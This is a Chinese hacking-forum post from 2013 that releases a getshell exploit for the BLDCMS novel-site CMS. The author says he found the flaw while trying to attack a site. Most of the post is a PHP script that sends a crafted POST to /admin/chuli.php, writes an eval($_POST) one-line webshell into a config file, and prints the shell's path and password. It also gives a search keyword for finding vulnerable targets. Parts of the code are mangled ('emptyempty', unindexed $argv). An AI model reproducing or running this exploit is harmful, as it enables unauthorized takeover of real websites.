admin 发表于 2013-3-26 20:49:10

BLDCMS(白老大小说) Getshell 0day EXP

之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞


话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了

既然都有人发了 我就把我之前写好的EXP放出来吧

view source print?01.php;">
02.<!--?php
03.echo "-------------------------------------------------------------------
04.
05.------------\r\n            BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
06.
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
08.
09.QQ:981009941\r\n                              2013.3.21\r\n            
10.
11.
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
13.
14.)\r\n                  搜索关键字:\"开发者: 白老大小说\"\r\n-----------
15.
16.--------------------------------------------------------------------\r\n";
17.$url=$argv;
18.$dir=$argv;
19.$pass=$argv;
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
21.if (emptyempty($pass)||emptyempty($url))
22.{exit("请输入参数");}
23.else
24.{
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
26.
27.al;
28.$length = strlen($fuckdata);
29.function getshell($url,$pass)
30.{
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
32.$header = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
34.$header .= "User-Agent: MSIE\r\n";
35.$header .= "Host:".$url."\r\n";
36.$header .= "Content-Length: ".$length."\r\n";
37.$header .= "Connection: Close\r\n";
38.$header .="\r\n";
39.$header .= $fuckdata."\r\n\r\n";
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
41.if (!$fp)
42.{
43.exit ("利用失败:请检查指定目标是否能正常打开");
44.}
45.else{ if (!fputs($fp,$header))
46.{exit ("利用失败");}
47.else
48.{
49.$receive = '';
50.while (!feof($fp)) {
51.$receive .= @fgets($fp, 1000);
52.}
53.@fclose($fp);
54.echo "$url/$dir/conn/config/normal2.php pass:$pass(如连接失败 请检查目标
55.
56.GPC是否=off)";
57.}}
58.}
59.}
60.getshell($url,$pass);
61.?-->



by 数据流
页: [1]
查看完整版本: BLDCMS(白老大小说) Getshell 0day EXP